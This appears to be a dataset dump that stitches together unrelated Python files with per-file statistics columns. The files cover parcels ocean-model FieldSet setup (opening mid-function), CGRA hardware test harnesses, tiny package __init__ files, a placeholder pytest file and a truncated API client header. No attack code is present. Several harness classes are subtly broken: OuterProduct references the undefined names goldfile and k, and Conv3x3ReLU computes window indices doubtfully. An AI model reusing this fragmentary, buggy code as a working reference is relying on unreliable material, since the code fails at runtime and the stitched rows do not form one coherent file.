    # static bathymetry only has lon/lat.
    dims4d = {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'}
    dimensions = {name: dict(dims4d)
                  for name in ('U', 'V', 'W', 'cell_areas', 'T', 'S')}
    dimensions['B'] = {'lon': 'ULONG', 'lat': 'ULAT'}
    # Identity comparison with None (PEP 8) instead of 'indices != None'.
    if indices is not None:
        fieldset = FieldSet.from_pop(filenames, variables, dimensions,
                                     indices=indices,
                                     allow_time_extrapolation=False)
    else:
        fieldset = FieldSet.from_pop(filenames, variables, dimensions,
                                     allow_time_extrapolation=False)
    fieldset.U.vmax = 10  # set max of flow to 10 m/s
    fieldset.V.vmax = 10
    fieldset.W.vmax = 10
    fieldset.T.vmin = -5
    # Static fields must be usable at any simulation time.
    fieldset.cell_areas.allow_time_extrapolation = True
    fieldset.B.allow_time_extrapolation = True
    fieldset.cell_areas.set_scaling_factor(0.0001)  # cm^2 to m^2
    return fieldset
def set_pop_fieldset_bolus(ufiles, dimfiles, dfile, bfile, afile, indices=None):
    """Create a parcels FieldSet for POP output including the eddy-induced
    (bolus) velocities Ubolus/Vbolus in addition to U, V, W, T, S,
    bathymetry ('B') and cell areas.

    Parameters
    ----------
    ufiles : data file(s) holding UVEL, VVEL, WVEL, UISOP, VISOP, TEMP, SALT
    dimfiles : unused; kept for backward compatibility with existing callers
    dfile : file providing the depth dimension ('w_dep')
    bfile : file providing the lon/lat grid and the Bathymetry variable
    afile : file providing the cell-area (UAREA) data
    indices : optional dict restricting the grid indices loaded by parcels

    Returns
    -------
    parcels FieldSet with velocity caps, unit conversions for the bolus
    velocities and cell areas, and static fields allowed to extrapolate
    in time.
    """
    def _grid_files(data):
        # All fields share the same lon/lat/depth grid files; only the
        # data source differs.
        return {'lon': bfile, 'lat': bfile, 'depth': dfile, 'data': data}

    filenames = {'U': _grid_files(ufiles),
                 'V': _grid_files(ufiles),
                 'W': _grid_files(ufiles),
                 'Ubolus': _grid_files(ufiles),
                 'Vbolus': _grid_files(ufiles),
                 'S': _grid_files(ufiles),
                 'T': _grid_files(ufiles),
                 'B': _grid_files(bfile),
                 'cell_areas': _grid_files(afile)}
    variables = {'U': 'UVEL',
                 'V': 'VVEL',
                 'W': 'WVEL',
                 'cell_areas': 'UAREA',
                 'Ubolus': 'UISOP',
                 'Vbolus': 'VISOP',
                 'T': 'TEMP',
                 'S': 'SALT',
                 'B': 'Bathymetry'}
    # Every time-varying field uses the same 4-D dimension names; the
    # static bathymetry only has lon/lat.
    dims4d = {'lon': 'ULONG', 'lat': 'ULAT', 'depth': 'w_dep', 'time': 'time'}
    dimensions = {name: dict(dims4d)
                  for name in ('U', 'V', 'W', 'cell_areas',
                               'Ubolus', 'Vbolus', 'T', 'S')}
    dimensions['B'] = {'lon': 'ULONG', 'lat': 'ULAT'}
    # Identity comparison with None (PEP 8) instead of 'indices != None'.
    if indices is not None:
        fieldset = FieldSet.from_pop(filenames, variables, dimensions,
                                     indices=indices,
                                     allow_time_extrapolation=False)
    else:
        fieldset = FieldSet.from_pop(filenames, variables, dimensions,
                                     allow_time_extrapolation=False)
    fieldset.U.vmax = 10  # set max of flow to 10 m/s
    fieldset.V.vmax = 10
    fieldset.W.vmax = 10
    fieldset.Ubolus.set_scaling_factor(0.01)  # cm/s to m/s
    fieldset.Vbolus.set_scaling_factor(0.01)  # cm/s to m/s
    fieldset.cell_areas.set_scaling_factor(0.0001)  # cm^2/s to m^2/s
    fieldset.T.vmin = -5
    # Static fields must be usable at any simulation time.
    fieldset.cell_areas.allow_time_extrapolation = True
    fieldset.B.allow_time_extrapolation = True
    return fieldset
| 41.978873
| 119
| 0.402114
| 551
| 5,961
| 4.246824
| 0.123412
| 0.054701
| 0.075214
| 0.109402
| 0.952991
| 0.931624
| 0.931624
| 0.931624
| 0.916239
| 0.902564
| 0
| 0.011088
| 0.425096
| 5,961
| 141
| 120
| 42.276596
| 0.671725
| 0.017279
| 0
| 0.897638
| 0
| 0
| 0.161423
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015748
| false
| 0
| 0.007874
| 0
| 0.03937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c52caed7197369a95d057967449f9e0ccbda08c1
| 130
|
py
|
Python
|
db_conn/__init__.py
|
szkkteam/db_conn
|
06cf0bc98b92ce542e7475afdd33eb5eb9f27645
|
[
"MIT"
] | null | null | null |
db_conn/__init__.py
|
szkkteam/db_conn
|
06cf0bc98b92ce542e7475afdd33eb5eb9f27645
|
[
"MIT"
] | null | null | null |
db_conn/__init__.py
|
szkkteam/db_conn
|
06cf0bc98b92ce542e7475afdd33eb5eb9f27645
|
[
"MIT"
] | null | null | null |
from db_conn.connection import postgresql as psql
from db_conn import utils
from db_conn import queue
from db_conn import query
| 32.5
| 50
| 0.838462
| 23
| 130
| 4.565217
| 0.478261
| 0.228571
| 0.380952
| 0.457143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 130
| 4
| 51
| 32.5
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c537befe79dc55128d45f621a863431d058c7d05
| 133
|
py
|
Python
|
pyblazing/blazingsql/__init__.py
|
romulo-auccapuclla/blazingsql
|
c85429479cabc0907212e880d590441f25eb3b59
|
[
"Apache-2.0"
] | 1
|
2020-01-11T15:43:22.000Z
|
2020-01-11T15:43:22.000Z
|
pyblazing/blazingsql/__init__.py
|
romulo-auccapuclla/blazingsql
|
c85429479cabc0907212e880d590441f25eb3b59
|
[
"Apache-2.0"
] | 3
|
2020-07-26T05:17:38.000Z
|
2021-03-22T16:36:11.000Z
|
pyblazing/blazingsql/__init__.py
|
romulo-auccapuclla/blazingsql
|
c85429479cabc0907212e880d590441f25eb3b59
|
[
"Apache-2.0"
] | 1
|
2021-03-22T15:59:39.000Z
|
2021-03-22T15:59:39.000Z
|
from pyblazing.apiv2 import S3EncryptionType
from pyblazing.apiv2 import DataType
from pyblazing.apiv2.context import BlazingContext
| 33.25
| 50
| 0.879699
| 16
| 133
| 7.3125
| 0.5
| 0.333333
| 0.461538
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.033058
| 0.090226
| 133
| 3
| 51
| 44.333333
| 0.933884
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
c546a050342700e48a7a14ed5c101f8fbd5ab6d1
| 19,704
|
py
|
Python
|
apps/hardware_benchmarks/handcrafted/handcrafted_ub_layer_gb/applications.py
|
mfkiwl/Halide-to-Hardware
|
15425bc5c3d7a243de35fe15a3620a7c2c1cf63e
|
[
"MIT"
] | 60
|
2019-01-23T22:35:13.000Z
|
2022-02-09T03:31:30.000Z
|
apps/hardware_benchmarks/handcrafted/handcrafted_ub_layer_gb/applications.py
|
mfkiwl/Halide-to-Hardware
|
15425bc5c3d7a243de35fe15a3620a7c2c1cf63e
|
[
"MIT"
] | 79
|
2019-02-22T03:27:45.000Z
|
2022-02-24T23:03:28.000Z
|
apps/hardware_benchmarks/handcrafted/handcrafted_ub_layer_gb/applications.py
|
mfkiwl/Halide-to-Hardware
|
15425bc5c3d7a243de35fe15a3620a7c2c1cf63e
|
[
"MIT"
] | 12
|
2019-02-21T00:30:31.000Z
|
2021-11-03T17:05:39.000Z
|
import numpy as np
from commands import *
class OneShotValid():
    """Run one application end-to-end on the CGRA and validate its output.

    commands() builds the full command stream: reset, configure the CGRA
    from the bitstream, stream the input image through the global buffer,
    start the accelerator, wait for the completion interrupt, and read the
    output back into outfile.  verify() compares outfile with goldfile.
    """

    def __init__(self, bitstream, infile, goldfile, outfile, args):
        # bitstream: CGRA configuration bitstream file
        # infile: raw uint8 input image
        # goldfile: raw uint8 expected output
        # outfile: destination for the actual output read from the CGRA
        # args: parsed CLI options; only args.width is read here
        self.bitstream = bitstream
        self.infile = infile
        self.goldfile = goldfile
        self.outfile = outfile
        self.args = args

    def commands(self):
        """Return the command list for a single complete run."""
        # Data is uint8 on disk but streamed to the CGRA as 16-bit words.
        im = np.fromfile(
            self.infile,
            dtype=np.uint8
        ).astype(np.uint16)
        gold = np.fromfile(
            self.goldfile,
            dtype=np.uint8
        ).astype(np.uint16)
        return [
            WRITE_REG(GLOBAL_RESET_REG, 1),
            # Stall the CGRA
            WRITE_REG(STALL_REG, 0b1111),
            # Enable interrupts
            WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
            # WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1), # TODO: removeme
            # WRITE_REG(SOFT_RESET_DELAY_REG, 0), # TODO: removeme
            # Configure the CGRA
            PRINT("Configuring CGRA..."),
            # *gc_config_bitstream(self.bitstream),
            *gb_config_bitstream(self.bitstream, width=self.args.width),
            PRINT("Done."),
            # # TODO: Do it again to test the interrupts, but remove later.
            # PRINT("Configuring CGRA..."),
            # # *gc_config_bitstream(self.bitstream),
            # *gb_config_bitstream(self.bitstream, width=self.args.width),
            # PRINT("Done."),
            # Set up global buffer for pointwise
            *configure_io(IO_INPUT_STREAM, BANK_ADDR(0), len(im), width=self.args.width),
            # TODO: would be better if this took in the input and
            # output tiles of the application and then configured the
            # io controllers appropriately.
            *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), io_ctrl=1, width=self.args.width),
            # *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
            # *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(4), len(gold), width=self.args.width),
            # Put image into global buffer
            PRINT("Transferring input data..."),
            WRITE_DATA(BANK_ADDR(0), 0xc0ffee, im.nbytes, im),
            PRINT("Done."),
            # Start the application
            PRINT("Starting application..."),
            WRITE_REG(STALL_REG, 0),
            PEND(0b01, "start"),
            WRITE_REG(CGRA_START_REG, 1),
            PRINT("Waiting for completion..."),
            WAIT(0b01, "start"),
            PRINT("Done."),
            PRINT("Reading output data..."),
            READ_DATA(
                BANK_ADDR(16),
                gold.nbytes,
                gold,
                _file=self.outfile,
            ),
            PRINT("All tasks complete!"),
        ]

    def verify(self, result=None):
        """Compare the produced output with the gold file.

        result: optional pre-loaded output array; when None the output is
        read back from self.outfile.  Returns True on an exact match,
        False otherwise (printing every mismatching element).
        """
        print("Comparing outputs...")
        gold = np.fromfile(
            self.goldfile,
            dtype=np.uint8,
        )
        if result is None:
            result = np.fromfile(
                self.outfile,
                dtype=np.uint16,
            ).astype(np.uint8)
        if not np.array_equal(gold, result):
            if len(gold) != len(result):
                print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
            for k, (x, y) in enumerate(zip(gold, result)):
                if x != y:
                    print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
            return False
        print("Outputs match!")
        return True
class OneShotStall(OneShotValid):
    """Variant of OneShotValid that toggles the CGRA stall register while
    the application runs, to exercise stall/resume behavior.  Inherits
    verify() from OneShotValid.
    """

    def commands(self):
        """Return the command list for one run with interleaved stalls."""
        # Data is uint8 on disk but streamed to the CGRA as 16-bit words.
        im = np.fromfile(
            self.infile,
            dtype=np.uint8
        ).astype(np.uint16)
        gold = np.fromfile(
            self.goldfile,
            dtype=np.uint8
        ).astype(np.uint16)
        return [
            WRITE_REG(GLOBAL_RESET_REG, 1),
            # Stall the CGRA
            WRITE_REG(STALL_REG, 0b1111),
            # Enable interrupts
            WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
            # WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1), # TODO: removeme
            # WRITE_REG(SOFT_RESET_DELAY_REG, 0), # TODO: removeme
            # Configure the CGRA
            PRINT("Configuring CGRA..."),
            # *gc_config_bitstream(self.bitstream),
            *gb_config_bitstream(self.bitstream, width=self.args.width),
            PRINT("Done."),
            # # TODO: Do it again to test the interrupts, but remove later.
            # PRINT("Configuring CGRA..."),
            # # *gc_config_bitstream(self.bitstream),
            # *gb_config_bitstream(self.bitstream, width=self.args.width),
            # PRINT("Done."),
            # Set up global buffer for pointwise
            *configure_io(IO_INPUT_STREAM, BANK_ADDR(0), len(im), width=self.args.width),
            # TODO: would be better if this took in the input and
            # output tiles of the application and then configured the
            # io controllers appropriately.
            *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), io_ctrl=1, width=self.args.width),
            # *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
            # *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(4), len(gold), width=self.args.width),
            # Put image into global buffer
            PRINT("Transferring input data..."),
            WRITE_DATA(BANK_ADDR(0), 0xc0ffee, im.nbytes, im),
            PRINT("Done."),
            # Start the application
            PRINT("Starting application..."),
            WRITE_REG(STALL_REG, 0),
            PEND(0b01, "start"),
            WRITE_REG(CGRA_START_REG, 1),
            # Alternate stalling and releasing the CGRA mid-run to verify
            # it still completes with correct output.
            WRITE_REG(STALL_REG, 0b1111), # HACK
            STALL(50), # HACK
            WRITE_REG(STALL_REG, 0), # HACK
            STALL(100), # HACK
            WRITE_REG(STALL_REG, 0b1111), # HACK
            STALL(50), # HACK
            WRITE_REG(STALL_REG, 0), # HACK
            STALL(100), # HACK
            WRITE_REG(STALL_REG, 0b1111), # HACK
            STALL(50), # HACK
            WRITE_REG(STALL_REG, 0), # HACK
            PRINT("Waiting for completion..."),
            WAIT(0b01, "start"),
            PRINT("Done."),
            PRINT("Reading output data..."),
            READ_DATA(
                BANK_ADDR(16),
                gold.nbytes,
                gold,
                _file=self.outfile,
            ),
            PRINT("All tasks complete!"),
        ]
class Tiled():
    """Run a multi-tile application: tiles are double-buffered in the
    global buffer and processed back-to-back via the CGRA auto-restart
    mechanism, overlapping output readback with the next tile's run.
    """

    def __init__(self, bitstream, infiles, goldfiles, outfiles, args):
        # bitstream: CGRA configuration bitstream file
        # infiles/goldfiles/outfiles: per-tile input, expected-output and
        # actual-output files (parallel lists)
        # args: parsed CLI options; only args.width is read here
        self.bitstream = bitstream
        self.infiles = infiles
        self.goldfiles = goldfiles
        self.outfiles = outfiles
        self.args = args

    def commands(self):
        """Return the command stream that processes every tile."""
        # Data is uint8 on disk but streamed to the CGRA as 16-bit words.
        ims = [
            np.fromfile(
                infile,
                dtype=np.uint8
            ).astype(np.uint16)
            for infile in self.infiles
        ]
        golds = [
            np.fromfile(
                goldfile,
                dtype=np.uint8
            ).astype(np.uint16)
            for goldfile in self.goldfiles
        ]
        command_list = [
            WRITE_REG(GLOBAL_RESET_REG, 1),
            # Stall the CGRA
            WRITE_REG(STALL_REG, 0b1111),
            # Enable interrupts
            WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
            # WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1), # TODO: removeme
            # WRITE_REG(SOFT_RESET_DELAY_REG, 0), # TODO: removeme
            # Configure the CGRA
            PRINT("Configuring CGRA..."),
            # *gc_config_bitstream(self.bitstream),
            *gb_config_bitstream(self.bitstream, width=self.args.width),
            PRINT("Done."),
            # # TODO: Do it again to test the interrupts, but remove later.
            # PRINT("Configuring CGRA..."),
            # # *gc_config_bitstream(self.bitstream),
            # *gb_config_bitstream(self.bitstream, width=self.args.width),
            # PRINT("Done."),
        ]
        # Double-buffering: even tiles use one 2048-byte region, odd
        # tiles the other, for both input and output banks.
        in_addrs = [ BANK_ADDR(0) + 2048 * (k % 2) for k in range(len(ims)) ]
        out_addrs = [ BANK_ADDR(16) + 2048 * (k % 2) for k in range(len(golds)) ]
        for k in range(len(ims)):
            command_list += [
                PRINT(f"Loading input {k}..."),
                WRITE_DATA(in_addrs[k], 0xc0ffee, ims[k].nbytes, ims[k]),
                *configure_io(IO_INPUT_STREAM, in_addrs[k], len(ims[k]), width=self.args.width),
                *configure_io(IO_OUTPUT_STREAM, out_addrs[k], len(golds[k]), io_ctrl=1, width=self.args.width),
            ]
            if k == 0:
                command_list += [
                    WRITE_REG(CGRA_SOFT_RESET_EN_REG, 1),
                    WRITE_REG(STALL_REG, 0),
                    PEND(0b01, f"start"),
                    WRITE_REG(CGRA_START_REG, 1),
                ]
            else:
                command_list += [
                    WRITE_REG(CGRA_AUTO_RESTART_REG, 1),
                    PRINT(f"Waiting on {k-1}..."),
                    WAIT(0b01, f"start"),
                    PRINT(f"Reading output {k-1}..."),
                    READ_DATA(
                        out_addrs[k-1],
                        golds[k-1].nbytes,
                        golds[k-1],
                        # BUG FIX: tile k-1's output was written to
                        # outfiles[k], leaving outfiles[0] never written
                        # and every file off by one.
                        _file=self.outfiles[k-1],
                    ),
                ]
        # Drain the last tile.  BUG FIX: use an explicit index instead of
        # relying on the leaked loop variable k.
        last = len(golds) - 1
        command_list += [
            PRINT(f"Waiting on {last}..."),
            WAIT(0b01, f"start"),
            PRINT(f"Reading output {last}..."),
            READ_DATA(
                out_addrs[last],
                golds[last].nbytes,
                golds[last],
                _file=self.outfiles[last],
            ),
            PRINT("All tasks complete!"),
        ]
        return command_list

    def verify(self, results=None):
        """Compare every tile's output with its gold file.

        results: optional list of pre-loaded output arrays; when None the
        outputs are read back from self.outfiles.  Returns True when all
        tiles match exactly.
        """
        print("Comparing outputs...")
        golds = [
            np.fromfile(
                self.goldfiles[k],
                dtype=np.uint8,
            )
            for k in range(len(self.goldfiles))
        ]
        if results is None:
            results = [
                np.fromfile(
                    self.outfiles[k],
                    dtype=np.uint16,
                ).astype(np.uint8)
                for k in range(len(self.outfiles))
            ]
        for gold, result in zip(golds, results):
            if not np.array_equal(gold, result):
                if len(gold) != len(result):
                    print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
                for k, (x, y) in enumerate(zip(gold, result)):
                    if x != y:
                        print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
                return False
        print("Outputs match!")
        return True
class OuterProduct():
def __init__(self, bitstream, weightfiles, infiles, goldfile, outfile, args):
self.bitstream = bitstream
self.weightfiles = weightfiles
self.infiles = infiles
self.goldfile = goldfile
self.outfile = outfile
self.args = args
def commands(self):
wts = [
np.fromfile(
weightfile,
dtype=np.uint8
).astype(np.uint16)
for weightfile in self.weightfiles
]
ims = [
np.fromfile(
infile,
dtype=np.uint8
).astype(np.uint16)
for infile in self.infiles
]
gold = np.fromfile(
goldfile,
dtype=np.uint8
).astype(np.uint16)
command_list = [
WRITE_REG(GLOBAL_RESET_REG, 1),
# Stall the CGRA
WRITE_REG(STALL_REG, 0b1111),
# Enable interrupts
WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
# Configure the CGRA
PRINT("Configuring CGRA..."),
# *gc_config_bitstream(self.bitstream),
*gb_config_bitstream(self.bitstream, width=self.args.width),
PRINT("Done."),
]
# Load weights to consecutive memory in global buffer
wt_addr = BANK_ADDR(0)
wt_len = 0
for wt in wts:
command_list += [
PRINT(f"Loading weight {k}..."),
WRITE_DATA(wt_addr, 0xc0ffee, wt.nbytes, wt),
]
wt_addr += wt.nbytes
wt_len += len(wt)
# Load images to consecutive memory in global buffer
im_addr = BANK_ADDR(4)
im_len = 0
for im in ims:
command_list += [
PRINT(f"Loading weight {k}..."),
WRITE_DATA(im_addr, 0xc0ffee, im.nbytes, im),
]
im_addr += im.nbytes
im_len += len(im)
command_list += [
*configure_io(IO_INPUT_STREAM, BANK_ADDR(0), len(wts[0]), width=self.args.width),
*configure_io(IO_INPUT_STREAM, BANK_ADDR(4), im_len, width=self.args.width),
*configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
# Run the application
PRINT("Starting application..."),
WRITE_REG(STALL_REG, 0),
PEND(0b01, "start"),
WRITE_REG(CGRA_START_REG, 1),
# PRINT("Waiting for completion..."),
# PRINT("Done."),
]
# c code
# wait until semaphore == 0
# disable interrupts
# signal semaphore
# auto_restart = 1
# enable interrupts
# interrupt handler
# if semaphore > 0
# if auto_restart == 1
# auto_restart = 0
# cgra_start = 1
# decrement semaphore
for k in range(1, len(wts)):
command_list += [
*configure_io(IO_INPUT_STREAM, BANK_ADDR(0) + k*len(wts[0]), len(wts[k]), width=self.args.width),
*configure_io(IO_INPUT_STREAM, BANK_ADDR(4), im_len, width=self.args.width),
WRITE_REG(CGRA_AUTO_RESTART_REG, 1),
WAIT(0b01, "start"),
]
command_list += [
WAIT(0b01, "start"),
PRINT("Reading output data..."),
READ_DATA(
BANK_ADDR(16),
gold.nbytes,
gold,
_file=self.outfile,
),
PRINT("All tasks complete!"),
]
return command_list
def verify(self, results=None):
    """Compare run output against the golden reference.

    :param results: optional array-like of already-collected outputs; when
        omitted, outputs are read from ``self.outfile`` (stored as uint16
        words and narrowed back to uint8).
    :return: True when outputs match the golden data exactly, else False.
    """
    print("Comparing outputs...")
    gold = np.fromfile(
        self.goldfiles,
        dtype=np.uint8,
    )
    if results is None:
        # Harness wrote 16-bit words; narrow back to bytes for comparison.
        result = np.fromfile(
            self.outfile,
            dtype=np.uint16,
        ).astype(np.uint8)
    else:
        # BUG FIX: a caller-supplied `results` was previously ignored,
        # leaving `result` undefined (NameError on the comparison below).
        result = np.asarray(results, dtype=np.uint8)
    if not np.array_equal(gold, result):
        if len(gold) != len(result):
            print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
        for k, (x, y) in enumerate(zip(gold, result)):
            if x != y:
                print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
        return False
    print("Outputs match!")
    return True
class Conv3x3ReLU():
    """Test harness for a 3x3 convolution + ReLU application on the CGRA.

    Streams weights and input images into the global buffer, emits the
    per-window / per-output-channel IO configuration commands, and compares
    the produced output against a golden reference file.
    """

    def __init__(self, bitstream, weightfiles, infiles, goldfile, outfile, args):
        self.bitstream = bitstream      # CGRA bitstream to load
        self.weightfiles = weightfiles  # list of weight file paths (uint8 on disk)
        self.infiles = infiles          # list of input image file paths (uint8 on disk)
        self.goldfile = goldfile        # golden output file path
        self.outfile = outfile          # file the harness writes results to
        self.args = args                # must provide .width (IO bus width)

    def commands(self):
        """Build and return the full command list for the test run."""
        # Files hold uint8 data; widen to uint16 words for the data bus.
        wts = [
            np.fromfile(
                weightfile,
                dtype=np.uint8
            ).astype(np.uint16)
            for weightfile in self.weightfiles
        ]
        ims = [
            np.fromfile(
                infile,
                dtype=np.uint8
            ).astype(np.uint16)
            for infile in self.infiles
        ]
        # BUG FIX: was the undefined bare name `goldfile`; path lives on self.
        gold = np.fromfile(
            self.goldfile,
            dtype=np.uint8
        ).astype(np.uint16)
        command_list = [
            WRITE_REG(GLOBAL_RESET_REG, 1),
            # Stall the CGRA
            WRITE_REG(STALL_REG, 0b1111),
            # Enable interrupts
            WRITE_REG(INTERRUPT_ENABLE_REG, 0b11),
            # Configure the CGRA
            PRINT("Configuring CGRA..."),
            *gb_config_bitstream(self.bitstream, width=self.args.width),
            PRINT("Done."),
        ]
        # Load weights to consecutive memory in global buffer (bank 4)
        wt_addr = BANK_ADDR(4)
        wt_len = 0
        # BUG FIX: the loop body printed an undefined `k`; enumerate binds it.
        for k, wt in enumerate(wts):
            command_list += [
                PRINT(f"Loading weight {k}..."),
                WRITE_DATA(wt_addr, 0xc0ffee, wt.nbytes, wt),
            ]
            wt_addr += wt.nbytes
            wt_len += len(wt)
        # Load images to consecutive memory in global buffer (bank 0)
        im_addr = BANK_ADDR(0)
        im_len = 0
        for k, im in enumerate(ims):
            command_list += [
                # BUG FIX: message said "weight" for image loads (copy-paste).
                PRINT(f"Loading image {k}..."),
                WRITE_DATA(im_addr, 0xc0ffee, im.nbytes, im),
            ]
            im_addr += im.nbytes
            im_len += len(im)
        # Fixed layer geometry for this test: 16x16x64 in, 14x14x64 out (3x3 valid conv).
        in_chan = 64
        out_chan = 64
        in_x = 16
        in_y = 16
        out_x = 14
        out_y = 14
        for k in range(0, out_x * out_y):
            for j in range(0, 9):
                # NOTE(review): both coordinates are derived from the flat
                # output index k; a 2-D window walk would typically use
                # k // out_x and k % out_x here — confirm against the app.
                img_y = k + j // 3 - 1
                img_x = k + j % 3 - 1
                command_list += [
                    *configure_io(IO_INPUT_STREAM, BANK_ADDR(0) + (img_y * in_x + img_x) * in_chan, in_chan, width=self.args.width),
                ]
                for i in range(0, out_chan):
                    command_list += [
                        *configure_io(IO_INPUT_STREAM, BANK_ADDR(4) + j * out_chan * in_chan + i * in_chan, in_chan, width=self.args.width),
                    ]
                    if i == 0 and j == 0 and k == 0:
                        # Very first iteration: configure the output stream,
                        # unstall, and start the CGRA.
                        command_list += [
                            *configure_io(IO_OUTPUT_STREAM, BANK_ADDR(16), len(gold), width=self.args.width),
                            # Run the application
                            PRINT("Starting application..."),
                            WRITE_REG(STALL_REG, 0),
                            PEND(0b01, "start"),
                            WRITE_REG(CGRA_START_REG, 1),
                        ]
                    else:
                        # BUG FIX: removed a stray bare `WAIT(0b01, "start"),`
                        # expression statement after this list; its result was
                        # discarded, so it never contributed a command.
                        command_list += [
                            WRITE_REG(CGRA_AUTO_RESTART_REG, 1),
                            WAIT(0b01, "start"),
                        ]
        command_list += [
            WAIT(0b01, "start"),
            PRINT("Reading output data..."),
            READ_DATA(
                BANK_ADDR(16),
                gold.nbytes,
                gold,
                _file=self.outfile,
            ),
            PRINT("All tasks complete!"),
        ]
        return command_list

    def verify(self, results=None):
        """Compare run output against the golden file; True on exact match."""
        print("Comparing outputs...")
        # BUG FIX: attribute is `goldfile` (set in __init__), not `goldfiles`.
        gold = np.fromfile(
            self.goldfile,
            dtype=np.uint8,
        )
        if results is None:
            # Harness wrote 16-bit words; narrow back to bytes for comparison.
            result = np.fromfile(
                self.outfile,
                dtype=np.uint16,
            ).astype(np.uint8)
        else:
            # BUG FIX: a caller-supplied `results` was previously ignored,
            # leaving `result` undefined (NameError).
            result = np.asarray(results, dtype=np.uint8)
        if not np.array_equal(gold, result):
            if len(gold) != len(result):
                print(f"ERROR: Expected {len(gold)} outputs but got {len(result)}")
            for k, (x, y) in enumerate(zip(gold, result)):
                if x != y:
                    print(f"ERROR: [{k}] expected 0x{x:x} but got 0x{y:x}")
            return False
        print("Outputs match!")
        return True
| 32.730897
| 140
| 0.494265
| 2,143
| 19,704
| 4.380308
| 0.085394
| 0.034942
| 0.036007
| 0.049856
| 0.891659
| 0.875573
| 0.865985
| 0.852775
| 0.826888
| 0.805476
| 0
| 0.026168
| 0.394894
| 19,704
| 601
| 141
| 32.785358
| 0.761134
| 0.141849
| 0
| 0.778555
| 0
| 0
| 0.079555
| 0
| 0
| 0
| 0.003332
| 0.001664
| 0
| 0
| null | null | 0
| 0.004662
| null | null | 0.037296
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3d6ff40decdf406f358c0237bc8d07335924c92b
| 129
|
py
|
Python
|
test_nothing.py
|
yaleman/ha_mqtt_gpio
|
6fa2f8847ccca277805d311945fa0460b8e67b28
|
[
"MIT"
] | null | null | null |
test_nothing.py
|
yaleman/ha_mqtt_gpio
|
6fa2f8847ccca277805d311945fa0460b8e67b28
|
[
"MIT"
] | null | null | null |
test_nothing.py
|
yaleman/ha_mqtt_gpio
|
6fa2f8847ccca277805d311945fa0460b8e67b28
|
[
"MIT"
] | null | null | null |
""" tests nothing, makes pytest happy """
def test_nothing():
    """Placeholder test: always passes so the pytest run is never empty."""
    assert True
| 18.428571
| 48
| 0.658915
| 16
| 129
| 5.25
| 0.625
| 0.285714
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209302
| 129
| 6
| 49
| 21.5
| 0.823529
| 0.55814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3d97002cd191b044728e5c57a44ac1c10e5b2b08
| 418,086
|
py
|
Python
|
TweakApi/apis/design_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/design_api.py
|
tweak-com-public/tweak-api-client-python
|
019f86da11fdb12683d516f8f37db5d717380bcc
|
[
"Apache-2.0"
] | null | null | null |
TweakApi/apis/design_api.py
|
